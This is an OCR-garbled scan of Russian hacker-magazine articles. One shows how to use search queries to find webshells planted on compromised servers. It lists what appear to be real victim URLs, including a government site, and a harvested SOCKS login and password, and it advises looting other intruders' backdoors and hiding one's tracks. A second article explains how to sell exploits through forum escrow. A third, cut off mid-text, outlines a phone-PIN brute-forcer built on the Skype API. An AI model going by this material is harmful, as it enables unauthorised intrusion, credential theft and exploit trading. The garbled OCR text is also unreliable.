веб- каталоги хакерские скрипты не имеет смысла. А искать уязвимые 
сервисы, руководствуясь багтраком, долго и муторно. К тому же ни один 
из подобных вариантов не способствует быстрому выполнению постав- 

► 054 



ленной задачи. Поэтому мы будем действовать другими методами :). 

Для начала обратимся клюбимому Гуглу. Еслиты наивно полагаешь, что по- 
исковикхакеру нетоварищ.то глубоко заблуждаешься, боодіе не раз выручал 
меня в трудных ситуациях (читай подшивку «Хакера»), и этот случай не исклю- 
чение. Какты помнишь, поисковикпозволяетсоставлятьдовольнохитрые 
запросы, используя специальные конструкции (например, біеіуре, іпвііе, іпбех. 
об еію). Мануэлов по теме хватает, поэтому я ограничусьлишь краткими ком- 
ментариями. Изначально было решено отталкиваться отзапроса в Гуглетипа: 
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Парсим каталоги с чмодом 777 :] 



іпигі :г57з!іе11 + і:і1е1іуре:р1ір 

Для тех, кто не в теме, поясню: ключ іпигі позволяет проводить поиск по адрес- 
ной строке, а параметр Іііеіуре определяетуказанное нами расширение. Таким 
образом, после нажатия на <Еп1ег> Ѳоодіе в два счета вывел пару десятков 
линков, удовлетворяющих моемутребованию (скрипт г575ЬеІІ.рЬр в составе 
ссылки). Благодаря этому мной был сразуже получен первый г57-шелл : 

ІШЬр : / /шт. каир-зСаЬаи . сош/г57з]те11 .ріір 

На сервере крутились Л инуха, МуБОЦ АрасЬе и РНР версии 4.4.2 с опцией 
5а1е_тас1е=0М. Тем не менее это не помешало мне слить базу, заботливо 
упакованную в 2 Ір-архив и размещенную в корне веб-каталога :]. С заметно 
улучшившимся настроением я принялся экспериментировать дальше, а 
подредактированный запрос к поисковику принял такой вид: 

іпСіСІе : г57з1те11 + Ті1еСуре : ріір 

То есть я попросту позволил Гуглу выдавать мне в качестве результата стра- 
ницы, содержащие в заголовке строку « г57зЬеІІ» и имеющие расширение 
рЬр. Объем предоставленных поисковиком линков меня просто потряс. 
Конечно, около 50% ресурсов не имели никакого отношения к искомому 
объекту, зато остальные 50%. .. :) В общем, в течение часа я собрал порядка 
20 вполне работоспособных веб-шеллов, к примеру: 

ІіССр: //апдеііисі. сош/е/г57 .ріір 
ІіССр: //шіІТшипсІіег . пеС/ (Титр. ріір 

Но и на этом останавливаться я не собирался :). Посуди сам, ведь г57 не 
единственный в мире веб-шелл, ведь полно и других, не менее распростра- 
ненных скриптов, нетакли? Примеромтому служит популярный с995ІіеІІ, 
который прекрасно находится в Гугле с помощью аналогичныхзапросов: 

с99з!іе11 + бі1еСуре : ріір 

с99 + бі1еСуре : ріір 

іпигі : с99з!іе11 + іі1еСуре :р!ір 

Старания мои не были напрасны, и список нажитого добра пополнился 
десятком записей: 

ІіССр : / /ѵмѵі . сгарСѵ. сош/зСоге/СезС .ріір 

ІіССр : / /ѵллплп рсроІіСі . сот/іііір . ріір 

ІіССр : //ѵ^ѵт.тіпітаіі . Іг/а<±піп/іі1ез/с99 .ріір 

Надо сказать, что после двух часов активного парсинга веб-шеллами я 
был обеспечен на месяц вперед :). Прочувствовав суть затеи и радость от 



сбора урожая, я не поленился пробежаться по другим скриптам, втом числе 
и по МуБОГ-клиентам, А5Р-шеллам и прочим прелестям из стандартного 
хакерского набора. Несмотря нато что запросы к поисковику приходилось 
постоянно редактировать, результат не переставал меня радовать :). 
Наигравшисьс массовым парсингом, я начал подумывать оточечном 
поиске ранее залитых веб-шеллов на конкретно взятом ресурсе. Отличия 
запроса в этом случае были невелики, и в общем виде он выглядел так: 

название_шелла+ іпигі : адрес_ресурса+іі1еСуре : расшире- 

ние_скрипта 

Взяв для примера один изтурецких госресурсов в доменной зоне .доѵ.іг, я 
без особого труда опробовал теорию на практике. «Счастливцем» оказался 
сайт, располагавшийся по адресѵ ѵѵѵѵѵѵ.іеіп.доѵіг . Я перепробовал несколь- 
ко запросов к Гуглу, и мнетаки повезло: 

с9 9з!іе11 + іпзіСе : ѵлапл. іеСС . доѵ. Сг+ііІеСуре :р!ір 
На сервере лежал с99-шелл, залитый ранее одним из моихзнакомых: 

ІіССр : / /шт. іеСС . доѵ . Сг/кіСар/кіСар . ріір 

То, что было с госресурсом дальше, — это тема для отдельной статьи, ко- 
торую я, быть может, когда-нибудь напишу. Но, какты понимаешь, шеллы 
— далеко не самоцель, да и работать через веб-интерфейс не всегда 
удобно. Думаю, ты уже догадался, о чем я. Если в Сети полно хорошо (и не 
очень :)) спрятанных веб-шеллов, то бэкдоров, висящих на стандартных 
портах, еще больше. А о функции ЬіпсІ из тех же г57, с99 и им подобных и 
говорить не стоит. Как правило, многие из атакующих предпочитают не 
париться и открывают дефолтный порт под номером 1 1457 (без логина/ 
пароля :)). Признаться, порой мнетоже лень изменять значения порта в 
сорце бинд-шелла (его исходник ищи на нашем БѴБ). 

Как видишь, простенький би нд- шелл с дефолтными параметрами имеет 
все шансы спасти мир :). Крометого, ничто не мешаетсканироватьдиа- 
пазон ІР-адресов на наличие открытого искомого порта. Аучитываято, 
что создать собственную базу по стандартным портам распространенных 
бэкдоров не столь сложно, появляется возможность разжиться халявным 
доступом куда угодно. 

Н СОБИРАЕМ УЛИКИ 

Но кроме банального парсинга Гугла и скана широкого диапазона 
ІР'шников есть и более интересные вещи. Тебе никогда не хотелось понаб- 
людатьза чьей-либо активностью нахакнутом сервере? А поиметь парочку 
приватных сплоитов совершенно бесплатно? :) Спешу тебя заверить, что и 
первое, и второе вполне возможно. Для этого не нужно быть экстрасенсом и 
обладатьтелепатическими способностями, вовсе нет. Достаточно проявить 
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Найденный веб-шелл на турецком госресурсе 




/«\ 



> іп^о 

Анализируй храня- 
щийся на сервере 
контент, особое 
внимание уделяй 
каталогам с чмодом 
777 и файлам 
.ЬавЬ_Ы5Іогу. 
Похакал — убери за 
собой :). Не оставляй 
на взломанном сер- 
вере лишних следов. 



/«ѵ 






> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с це- 
лью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 



капельку внимания к взломанным объектам, приправив ее 
соответствующими знаниями :]. Ведь если что-то смог сделать 
ты, то неисключено, что то же самое сможет сделать кто-ни- 
будь другой (и наоборот). Мне не раз доводилось находить на 
ломанном сервере чужие скрипты/бэкдоры/сплоиты/еіс. Где 
именно искать все это добро? Вопрос, скорее, риторический, 
но несколько советов я дам: 

1 . Первым делом всегда осматривай каталог Ат р на никсовых 
серваках. В процессе взлома им редко кто пренебрегает, поэто- 
му найти там следы жизни представляется очень вероятным. 

2. Проводи глубокий анализ .ЬазЬ_Ы5Іогу всех пользователей, 
на доступ к каталогам которых хватает прав. Этотдружелюб- 
ный для хакера файл хранит в себе лог консольных команд, 
выполненных юзером, там запросто можно подцепить пасс к 
чужому а кку (от55Н или БД). Например, на одном из серверов 
в .ЬавЬ_Ыв1огу я нашел довольно любопытную запись: 

сЪтосІ 777 . /зб/Ьошісег 
. /зГ/Ьоипсег 

. /зб/Ьоипсег --зоскзБ --рогк 24465 --з_изег 
зргоок --з_раззъгогс1 пОсІООк --сіаетоп 

Воттак я заполучил аккаунт ксоксу, запущенному в качестве 
демона кем-то до меня: 

логин: зргооЪ 
пароль: пОсЮОк 
порт: 24465 

3. Просматривай (хотя бы бегло) раввѵѵб-файл, так как 
некоторые любят добавлять в систему своего пользователя с 
рутовыми правами (и пустым паролем). То же самое, кстати, 
относится и к СУБД, в частности к Му50І_. Нередки случаи, 
когда, поимев рута в БД, атакующий добавляет своего юзера 
в таблицу тузцЕизег. Мне несколько раз попадались подоб- 
ные базы и, думаю, еще будут попадаться. 

4 . Используй консольный поиске дополнительными 
параметрами. Поверь, при умелом обращении с утилой 



Гпб ты быстро найдешь то, что иначе искал бы часа- 
ми. В качестве примера приведу запрос на поиск всех 
.ЬазЬ_Ыз1:огу-файлов на сервере: 

Ріпсі / -Дуре Г -паше . ЬазТЦтізЪогу 

Или попробуем определить все диры с чмодом 777: 

Гіпсі / -Дуре сі -регш 0777 

По найденным каталогам советую хорошенько пошарить, так 
как вполне возможно, что в них лежат нетолько пользователь- 
ские доки :). 

5 . Незабывай ологах, будьто логи Апача, Сендмейла или 
какого-либо РТР-сервера. В логах всегда можно обнаружить 
много интересного (начиная с признаков вторжения и закан- 
чивая чужими ІР-адресами). 

Уловок на самом деле великое множество, так что тренируй свою 
фантазию и незабывай об уголовной ответственности, которая 
может наступить вследствие неправомерного доступа кчему-либо 
:). С другой стороны, еслиты в свободное отхака время подраба- 
тываешьадмином.то не пренебрегай возможностью прочесать 
свой сервер вдоль и поперек. В моей памяти еще свежа история 
сруткитом, который провисел на сервере одной из крупнейших 
забугорныхтелекоммуникационных компаний более года :). 

Н ЗАМЕТАЕМ СЛЕДЫ 

Наверняка, по ходу прочтения статьи ты озадачился как ми- 
нимум одним вопросом: «Какскрыть собственную активность 
при взломе?» Сразу скажу, что универсального рецепта здесь 
нет. Если говорить о заливаемом в веб-каталоги «контенте» 
(веб-шеллы, мускул-клиенты), то по крайне мерее необходимо 
юзать примитивную РНР-авторизацию и удалять из скриптов 
заголовки, хранящиеся междутэгами <бИе> и <ДіНе>. А если 
речь идето бинд-шеллах, то какминимум незабывай менять 
дефолтный порт :]. Да и вообще, похакал —убери за собой, 
зачем оставлять следы, которые могут выдатьтебя? Безопас- 
ности много не бывает, береги себя.ІЗЕ 
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ОТ СОЗДАТЕЛЕЙ 

«ЛАБИРИНТ- ФАВіЙА» 



В КИНОТЕАТРАХ С 28 ФЕВРАЛЯ 






ЛЮІСОГ' 



\тата.Ргіиі-Рі1т . ги 





взлом 



ІС0884888, НТТР://М4С.ВЦ 



Деньги Щ-ЫД деньги 



Представь, что ты написал суперпробивной эксплойт для последнего Осла и тебе необ- 
ходимо его срочно продать. Ты думаешь, что, просто запостив объявление на одном из 
хакерских форумов, ты быстро отдашь его в хорошие руки за не менее хорошие деньги? 
Не все так легко, амиго... Если хочешь познать некоторые тонкости реализации знамени- 
той формулы «деньги — товар — деньги» в нашем хакерском мире, читай внимательно 
мою статью :). 



В ГАРАНТИРУЙ ЭТО! 

Возьмем ситуацию из предисловия к статье: у тебя есть новый 
приватный сплоит, и ты размещаешь объявление о его продаже, 
например, на одном из известнейших хакерских форумов ВХБ 
( іюгит.ѵѵеЬ-Наск.ги ). Ты создаешь новую тему в стиле: «Продается 
сплоит, пробивает ІЕ 5.x, 6.x, 7.x, за подробностями стучать в аську 
или писать на мыло, цена ІкѴѴМЕ». Могу поспорить, что через не- 
сколько минут после размещения объявления посыплются коммен- 
тарии типа: 

— Дай попробовать сплоит, деньги потом. 

— Ты обманываешь, никакого сплоита у тебя нет! 

— ТС , убей себя . 



Не ожидал такого? Зря, подобное встречается у всех начинающих продав- 
цов в инете. Итак, значит, чтобы успешно продать свой товар, тебе необхо- 
димо заручиться результатами какой-либо проверки на профпригодность :). 
Одна из таких проверок называется «гарант-сервис». Заключается она в 
том, чтоты отдаешьсвой сплоитспециальному человеку из администрации 
форума — гаранту (аськи и прочие координаты гарантов™ можешь найти 
втемахна форумах — «Проверка и гарант-сервис»). Гарант проверяеттвой 
товар и отписывается втвоейтеме, что проверка пройдена (или не пройде- 
на). Кстати, на время прохождения проверки тема закрывается, и еслиты 
не догадаешься пройти гаранта сам, то он вполне можетзакрытьтвоютему 
и отписать в ней, что идет проверка :). А если ты не захочешь отдавать свой 
товар гаранту (когда он его попросит) либо дашь не сам товар, а видео- 
/аудиоописание его работы или скриншот, то рискуешь быть пожизненно 
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забаненным на форуме или получить статус оленя (опять же пожизненно :]]. 
Если в твою голову закрадываются сомнения по поводу честности гарантов 
итыхочешьбытьуверенным втом, чтотвой суперприватный товар не пой- 
детпо рукам послетого, какой побываету проверяющего, я бы посоветовал 
тебе использоватьтолько проверенные временем гарант-сервисы форумов 
ШрУДогит.ѵѵеЬ-Ьаск.ги . ЫірУЛогит.апіЫсЬаІ.ги . Ьир:/Логит. 2 Іоу.огд и 
Ии р:/Ло гит .хакеру, ги . 

Н ПРОТЕГО! 

Но вот ты прошел гаранта, ион заапрувил твой товар, то есть разрешил 
его продавать. На форуме люди, увидевшие, что проверка пройдена, уже 
гораздо охотнее отписывают свои предложения о покупке. Что делать 
дальше? Ты же не будешь отдавать вперед сплоит, а затем ждать, когда 
тебе переведут деньги?! :) Первая и самая примитивная защита от 
кидалова — это протекция в ѴѴеЬМопеу. Существует два вида протекции: 
по времени и по коду. В случае перевода денежных средств с протекци- 
ей по времени, ты увидишь, что средства пришли, но воспользоваться 
ты ими с можешь только через указанное время (от 1 до 1 20 дней). Этот 
вид протекции нам не подходит. Обычно при проведении сделок все 
пользуются протекцией по коду. Для этого покупателем устанавливает- 
ся свой пароль на перевод, ставится максимальное время протекции 
на 1 20 дней, и только потом переводятся средства. Кактолько придут 
деньги, ты сможешь отдать свой сплоит щедро расплатившемуся стобой 
покупателю. После проверки работоспособности сплоита он скажеттебе 
код протекции, и все окажутся довольны :). Но это не самый безопасный 
способ проведения сделок, ведьты можешь просто не обратить внима- 
ния на то, насколько дней покупатель поставил протекцию (например, 
он поставит 1 день, и через этот 1 день средства уйдутобратно этому че- 
ловеку), можешь 5 раз неверно ввести код, деньги уйдут обратно твоему 
покупателю, и получится банальный кидок :(. 

Любую сделку, особенно на крупную сумму, лучше всего проводить через 
того же гаранта. Схема здесь простая. Вы договариваетесь с покупате- 
лем, что будете проводить сделку через гаранта. Покупатель переводит 
денежные средства гаранту (обычно это вся сумма, что он должен тебе за 
товар, плюсЗ% от сделки гаранту, если сумма сделки превышает 100 бак- 
сов). Далееты отправляешь гаранту свой сплоит, гарант проверяет его на 
работоспособность и переводит сплоит покупателю, а деньги — продавцу 
(то естьтебе). В итоге все снова должны остаться довольны :). Но опять 
же используй только проверенные гарант-сервисы, ссылки на которые я 
привел выше. 

Н ПРОВОДИМ СДЕЛКУ БЕЗ ЗАЩИТЫ 

Рассмотрим ситуацию, когда ты продаешь свой сплоит, а покупатель ни в 
какую не доверяет никаким протекциям и гарантам. Что делать? С одной 
стороны, тут попахивает кидаловом, но с другой — это можетбыть вполне 
реальный покупатель, посколькутеже самые кардеры боятся где-либо 
засветиться. Как проверить такого человека? Есть несколько способов. 

1. На форумах, перечисленных выше, юзай поиск в разделах 

Віаск ІізС, Ѵ\Лтібе ІізС и «Разборки». 

2. Погугли на тему : аська покупателя (мыло, ник) +Ыаск 

(блэк, кидок, кидалово) . 



3. Проверь данные покупателя на ПДбр : //кісіаіа . іпіо (на- 
звание говорит само за себя : ) ) . 

Тутты спросишь, что же такое Віаск Іівк ѴѴЬІІе іібі и «Разборки»? Все просто: 
«Разборки» — специализированный раздел на форумах, где люди постят 
недоказанные кидки (логи из аськи, мирки, мыла и т.д.). Затем эти разборки 
анализируются, доказываются или опровергаются покупателем, продавцом 
и всеми юзерами форума. Доказанные кидки перемещаются администра- 
цией или модераторами в раздел Віаск іібЕ То есть если аська и никчело- 
века присутствуют в блэк-листе, то сделки стаким человеком проводить не 
стоит, поскольку он точно кидала. 

Теперь про вайт-листы. Получить вайт-лист нетак-то просто. Для этого 
необходимо иметь некий авторитет в интернете и известность среди 
модераторов или администраторов форума. Твой вайт-лист в форуме может 
создать только администратор. Затем в нем могут постить отзывы о сделках 
стобой твои довольные покупатели :). То есть если ты имеешь вайт-лист на 
известном хак-форуме,то можешьбытьуверен в доверии покупателей при 
проведении сделок. Кстати, послеуспешной продажи своего товара попро- 
си отпостить втвоей теме довольного покупателя, посколькутебе итвоему 
авторитету в инете от это го будет только лучше. 

Н ПОЛУЧАЕМ ТРАСТ 

Как легко и просто получить вайт-лист? ѴѴН В предоставляеттебе такую 
возможность. Просто следуй инструкции ( ЬирЛЛогит.ѵѵеЬ-Ьаск.ги/іпсІех. 
рЬр?зЬоѵѵІоріс=6551 0 ): 

1. Соискатель вайта обращается к гарантам форума для 
получения голосов (смотри список тут: Пббр : / / Іогит. 
тлеЬ-Паск. ги/іпбех.р]тр?з]тоѵД:оріс = 3 623 6 . гаранты для 
получения голосов Ж) . 

Количество необходимых голосов — 3 . Каждый гарант впра- 
ве поставить индивидуальные условия получения голоса . 

2. После получения всех трех голосов соискатель вай- 
та вносит залог в сумме 10 0 Ѵ\/М2 и сообщает об этом 
на адрес саппорта ПтССо : / /Іогит.ѵ^еЬ-Паск. ги/іпбех. 
рПр?з1тоЖоріс=64072 ) . 

3. Соискатель получает вайт нового типа, который имену- 
ется примерно так: ЖВ[00 01] [2007.10.22] . 

4. В течение года часть суммы залога возвращается: 

— через 3 мес . — 10 Ѵ\/М2 ; 

— через б мес. — 20 ТШ2; 

— через 1 год — 29,5 Ѵ\/М2 . 

Запрос на возврат возлагается на самого владельца вай- 
та. Возврат происходит в течение 1-2 недель после полу- 
чения запроса (в случае присутствия саппорта на форуме, 
иначе через 1-2 недели по его возвращении) . 

5. Если имеющий вайт получает подтвержденный блэк, то 
вайт уничтожается, а остаток денег (если он имеется) не 
возвращается . 

Проделав все указанные действия, ты получишь полноценный вайт- 
лист на одном из известнейших хак-форумов. Но чтобы ты и дальше был 
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На нашем ОѴй ты 
найдешь несколько 
песен, посвященных 
кидалам.Увы, чести 
им это не прибав- 
ляет. 




/«ч 



> ІП^О 

Ыі:р://кісІаІа.іпбо/ 
кіазз гіррег.зЫтІ 

— классификатор 
кидал. 

Ы:1:р ://кіс!а Іа . і пбо/ 
кіазз гіррег2.зЫ:тІ 

— еще классифика- 
ция кидал. 
ЫірУ/кісІаІа. 
іпІо/саІаІод.зЫтІ 

— список кидал. 

Спасибо Маро за 
помощь в написании 
статьи ! 
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вайт-листед, постарайся ничем не подмочить свою репута- 
цию. Если таким образом ты не хочешь получать подтверж- 
дение своей честности при сделках в интернете, я советую 
тебе сделать персональный аттестат ѴѴеЬМопеу. Тогда уже 
точно никто не посмеет сомневаться в твоей честности, 
поскольку все данные втвоем кошельке будут оформлены 
на твой реальный паспорт (кстати, не факт, ведь, ничто не 
мешает кидале оформить аттестат на скан. — Прим. РогЬ'а). 
Итак, персональный аттестат выдается участнику системы 
ѴѴеЬМопеу Тгапзіег, получившему формальный или началь- 
ный аттестат после проверки его персональных (паспортных) 
данных одним из регистраторов (список регистраторов тут: 
Ыірз:// раззрог1:.ѵѵеЬтопеу.ги/а5р/РедІІ5І:.а5р?ге1:1:ісі=1 30 ) 

— участников партнерской программы Центра аттестации. 
Стоимость аттестата (минимум 5 ѴѴМ2) и условия получе- 
ния зависят от выбранного аттестатора. Личная встреча с 
аттестатором — основной способ получения персонального 
аттестата. Этим правом обладают все без исключения участ- 
ники партнерской программы Центра аттестации. 

После получение персоналки для тебя открываются практи- 
чески все двери в интернет-аукционах. 

Н ПРОКИДАЛОВО 

Вотты провел долгожданную сделку, но, несмотря на все мои 
рекомендации, тебя все же кинули :(. Кактутбыть?Я могу 
посоветоватьлишьодно — запоститьлюбые логи и скрин- 
шоты, относящиеся к вашей сделке втехже «Разборках» на 
форумах и активно доказывать кидок. Также можно написать 
в арбитраж ѴѴеЬМопеу. В инфе покупателя в ѴѴеЬМопеу будет 
пункт «Добавить претензию», и если у покупателя аттестат 
не выше формального, то его кошелек временно залочится. 

Но это мало что даст, поскольку обычно кидал ы регистрируют 
кошельки-однодневки (кстати, смотри на дату регистрации, 
на аттестат и на бизнес-левел ( В Ь) кошелька при проведении 
сделки; соответственно, чем эти параметры выше, тем больше 
траста покупателю). 



Кроме разборок и арбитража ѴѴеЬМопеу есть еще один, пос- 
ледний оплот кинутых на деньги в инете — сайт ШрУ/кісІаІа. 
іп|о. Он содержит базу из тысяч блэковых номеров аськи, мыл 
и ников. Туда жеты можешь внести и данные своего кидалы 
(только необходимо, чтобы перед этим кидок был реально 
доказан, например, в «Разборках»), Послетого как кидок 
окажется на сайте, я очень сомневаюсь, что этотущербный 
человексможетеще когда-либо проводить сделки :). Но опять 
же никто не сможет помешать ему сменить аську, ник, мыло и 
кидать снова и снова... Тут нужно полагаться исключительно 
на свое хакерское чутье. 

Н КАКЛУЧШЕ? 

Но хватит о грустном :). Напоследок я тебе расскажу, как 
сделать свое предложение наиболее выгодным в глазах 
потенциального покупателя. 

Во-первых, обрати внимание на предложения администра- 
ции форумов, находящиеся втемахтипа «Правила раздела», 
«Услуги». Обычно предлагается подвешиваниетемы выше 
остальных, выделение ее жирным шрифтом или цветом. 
Конечно, такиеуслуги стоят некоторых денег, но, поверь, 
заходить в твою тему будет гораздо больше потенциальных 
покупателей :). Кстати, чтобы воспользоваться этими услугами, 
необходимо пройти гаранта. Во-вторых, в самой теме сооб- 
щения напиши, что возможен торг, описывай подробно все 
возможности твоего товара; хорошо, если будут скриншоты. И, 
в-третьих, я надеюсь, что ты нетолько что зарегистрировался 
на форуме, где продаешьсвойтовар, поскольку больший траст, 
конечноже, вызывают старые регистрации с определенным 
количеством сообщений :). 

азы 

Ну вотя и изложил тебе основы товарно-денежных отношений 
в инете. Теперь, надеюсь, ты не окажешься кинутым, сохра- 
нишь свои деньги и удачно продашь свой товар. Продавай и 
зарабатывай, друг мой :).□□ 
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Модуль 

распознавания 

ответа 



ѴѴаѵ-файл 



КАК УЛОМАТЬ 
ЖЕЛЕЗНУЮ ТЕТКУ 



СОЗДАНИЕ БРУТФОРСЕРАДЛЯ ГОЛОСОВОГО МЕНЮ 



У одного моего знакомого есть тайное сексуальное желание (этот извращенец поведал 
мне его в пьяном бреду): он хочет уломать «железную тетку» (так в простонародье назы- 
вают автоинформатор). Вот уже на протяжении нескольких лет он набирает один и тот 
же номер, слышит в ответ: «Здравствуйте, вы попали в автоматическое сервисное меню 
компании...» — и уговаривает этот милый голосок провести с ним хотя бы пять минут за 
чашкой кофе, но она неприступна, как скала (жалко беднягу). 



^ОПИСАНИЕ ПРЕДМЕТНОЙ ОБЛАСТИ 

Но если серьезно, «железный голос» звучит в нашей жизни все чаще: это и 
сообщение о задолженности за телефон, и автоматическое сервисное меню 
операторов сотовой связи, и сервисное меню интернет-провайдеров; даже 
некоторые банки и платежные системы предоставляютуслугууправления 
счетом потелефону. Практически во всех перечисленныхтелефонных 
системах при доступе к конфиденциальным данным и сервисам, таким 
каксведения олицевом счете, управление профилем ит.д., используется 
система аутентификации, основанная на вводе номера пользователя 
(договора, контракта, счета, телефона и т.д.) и некоторого пароля, назовем 
его ПИН-кодом. То есть пользователь используеттоновый режим работы 



телефона (режим генерации йТМ Р-си гнал ов) для передачи данных. 
Система аутентификации стара, как мамонт, и методы ее взлома такиеже. 
Естественно, самый простой способ — это перебор всех возможных вари- 
антов ПИН-кода (предположим, что номер договора/контракта/счета/те- 
лефона уже известен), но слабое место этого метода — время, необходимое 
для перебора множества вариантов. А воттут начинается самое интерес- 
ное. Во-первых, ПИН-код является числом, то есть это пароль, в котором 
используются только цифры, таккакчерез телефонную сеть втоновом 
режиме можно передавать только цифры, знак«#» и знак«*». Во-вторых, 
не знаю почему, ПИН-коду большинства систем составляют четыре цифры. 
Получается, что, для того чтобы подобрать ПИН-код, достаточно перебрать 
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Если надумаешь писать 
еще какие-то приложе- 
ния для Бкуре, 
советую ознакомиться 
с Бкуре АРІ : 
сіеѵеіорег . 5 куре . сот 



Да ну его, этот АРІ 
На диске лежит про- 
грамма, которую не 
так уж сложно пере- 
делать под любые 
нужды . 
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обеспечивающее 
бесплатную голо- 
совую связь между 
компьютерами через 
интернет, а также 
платные услуги для 
связи с абонентами 
обычной телефон- 
ной сети. 
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Окно настройки временных интервалов 



не более 1 0 000 вариантов. На один ПИН- код уходит примерно 
30 сек; соответственно, на перебор 1 0 000 вариантов потре- 
буется 300 000 сек (или 83,3 часа). Для компьютера это ерунда, 
а вот для человека будет весьма затруднительно. Болеетого, 
автоинформатор специально создавался для ручного ввода. 

Но если попытаться автоматизировать процесс работы с авто- 
информатором, то ситуацию можно исправить. 
Автоматизировать процесс передачи логина и ПИН-кода 
втоновом режиме не проблема, этоумеетлюбой модем 
(ѵоісе-модемы могут даже распознавать та кие данные). Но вот 
п олу ч ить ответ го ра зд о сл ожн ее , та к ка к ответ о п ра в и л ьн ости/ 
неправильности пароля дает непосредственно сама «желез- 
ная тетка». Воттеперь обратная ситуация: человек поймет, 
о чем говорит «железная тетка», а для компьютера это будет 
некоторой проблемой. Несмотря на то что «тетка» «железная», 
говоритона человеческим голосом, соответственно, здесь 
необходима некоторая система распознавания речи. 

Итак, думаю, ты вникв предметную область, теперьдавай я 
сформулирую цель и задачи, которые преследовал конкретно 
я. Цель — получить логин и пароль для одной забугорной 
системы, работающей на основе голосового меню. 

ЗАДАЧИ: 

1) реализовать цикл перебора пароля; 

2 ) реализовать модуль передачи данных в теле- 
фонную сеть в виде БТМР - сигналов ; 

3) реализовать модуль приема ответа в виде го- 
лосового сообщения; 

4 ) реализовать модуль распознавания ответа. 

Основной способ достижения поставленной цели — создание 
брутфорсера, но для его создания необходимо решить пос- 
тавленные задачи. С первой задачей проблем не возникло, 
поэтому будем считать, что она решена. Вторую и третью 



задачу надо решать совместно, поскольку обе предполагают 
работу стелефонной сетью. В общем случае необходимо 
синтезировать ОТМР-сигналы и передавать их втелефонную 
сеть (как я уже говорил, это можно сделать через модем), затем 
необходимо записать ответ. Если быть болееточным, надо 
оцифроватьсигнал изтелефонной линии (этоопятьже можно 
сделать через ѵоісе-модем). 

Но для себя я решил эту задачу несколько иным образом, 
как мне кажется, более простым. В качестве посредника при 
доступе втелефонную сеть я использовал Бкуре. Он подошел 
мне по двум причинам. Во-первых, он имеет очень простой 
программный интерфейс, позволяющий решить все пробле- 
мы с генерацией йТМЕ и оцифровкой. Во-вторых, Бкуре давал 
мне возможность сэкономить на международныхзвонках, 
поскольку я «работал» с одним очень далеким американским 
голосовым сервисом :). Бкуре позволяетзаписать разговор 
в виде ѴѴАѴ-файла, соответственно, четвертый модуль будет 
представлен в качестве функции сравнения двух файлов, но 
к этому мы еще вернемся (это самый интересный модуль). 
Общая схема моего брутфорсера представлена на рисунке. 

Н МОДУЛЬ СВЯЗИ С БКУРЕ 

Ты, наверное, уже сталкивался с программой Бкуре. Помимо 
того что эта программа является интернет-телефоном, она 
также представляет собой некоторый сервер с командным 
интерфейсом на борту (Бкуре АРІ) для управления внутрен- 
ними функциями (звонками, сообщениями, видеоконферен- 
циями ит.д.). Для приложений ѴѴІп32 вБкуре имеется два 
способа передачи команд. Первый способ основан на системе 
оконных сообщений, то есть программа может отправлять 
команды, используя сообщения ѴѴМ_СОРУОАТА. Сначала 
программа отправляет широковещательное сообщение 
всем окнам и получает ответ от Бкуре, затем отправляется 
сообщение ѴѴМ_СОРУОАТА и в параметре БРАНАМ передается 




На дискеты смо- 
жешь найти мою 
программу, нотак 
как эта статья явля- 
ется методической, 
а не практической, 
программа немного 
урезана и проверяет 
только один вариант 
ПИН-кода. Зато в 
ней присутствуют не 
описанные в статье 
функции. И еще — у 
программы нет ни- 
какого хелпа, так что 
придется напрячь 
мозги, чтобы разо- 
браться что к чему. 
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сама команда для 5 куре. Второй способ предполагает использование СОМ- 
объекта 5куре4С0М, который предоставляетЭкуре АРІ в виде некоторого 
интерфейса. Но в этом случае необходимо еще скачать файл 5куре4Сот.сШ, 
который и является этим интерфейсом. 

Я писал свой брутфорсер на С#, поэтому мне было удобнее задейс- 
твовать второй способ. Для отправки ОТМР-сигналов я использовал 
команду 5 ЕТ САІ_І_ ОТМР <ѵа1ие>, где ѵаіие — один из символов 0-9, «#», 
«*». Для оцифровки ответа — команду АПЕР САП <ісі> 5ЕТ_01ІТРІІТ 
РІ ЕЕ=” РІ ЕЕЮСАТЮМ», где ісі — идентификатор сеанса связи (их может 
быть несколько), РІ ЕЕ_ЮСАТІ О N — имя файла, в который будетзапи- 
сываться весь звуковой поток (ѴѴАѴ РСМ, 1 6 КГц моно, 1 6 бит). Проще 
говоря, я перенаправлял выходной звуковой поток в ѴѴАѴ-файл. Также 
звуковой поток можно перенаправить на звуковую карту или локальный 
ТС Р- порт. Как создать или прервать сеанс связи (ну, в смысле дозво- 
ниться), я думаю, ты уже разобрался. 

Н МОДУЛЬ РАСПОЗНАВАНИЯ ОТВЕТА 

Итак, теперь самое важное и интересное — реализация модуля распозна- 
вания, поскольку без него никакого брутфорсера не получится. Для начала 
покажу всю схему работы переборщика (в скобках указано примерное 
время на выполнение операции). 

В принципе, его можно создать и без непосредственного распознавания, 
ведь, прослушав сообщение о результате аутентификации, сделать вывод 
отом, какая фраза была произнесена, можно поего длине, поскольку после 
ПИН-кода возможно два сообщения: либо ответ «Да», либо ответ «Нет». Но 
притаком подходе возникает проблема. 

Как видно из схемы, суммарное время, затраченное на один вариант, 
составляет 52-66 сек. Перебор 10 000 вариантов может занятьдо 183 часов, 
причем это время будет затрачено на подбор пароля для одного логина. 
Приветствие, ответ и подтверждение логина можно сократить без послед- 
ствий (если сервисное меню позволяетэто). А вот сообщение результата 
аутентификации сократить нельзя, поскольку тогда невозможно будет 
распознать тип ответа. 

Опятьже для себя я выбрал несколько другой способ. Стехнической 
точки зрения он более сложный, но, как говорил один персонаж мультика 
«Крылья, ноги и хвосты», «лучше день потерять, а потом за пять минут 
долететь». Я записал первые 3 секунды сообщения результата аутенти- 
фикации при ответе«Нет» и принял этузаписьза эталонное значение. 
Далее в самом брутфорсере (в модуле связи с Экуре) я реализовал запись 
первыхЗ секунд результата аутентификации и затем сравнил с эталонным 
значением. Если записи совпадают, то ПИН-код является неверным, в 
противном случае все ОК. 

Но в моем способе есть один технический нюанс — это функция срав- 
нения эталонного и записанного значении. Оба значения являются 
ѴѴАѴ-файлами, но побайтное ихсравнение невозможно. Посмотри на 
рисунок, на котором изображены два звуковых файла. Это пример эта- 
лонного и записанного значения. На наш взгляд, оба файла одинаковы, 
но для программы это абсолютно разные файлы, они даже по размеру 
отличаются друг от друга на несколько сотен байт. Поэтому, совпадает 
ли эталонное значение с записанным, сказать однозначно нельзя. Но 
можно оценить степень их схожести в процентах. Назовем эту оценку 



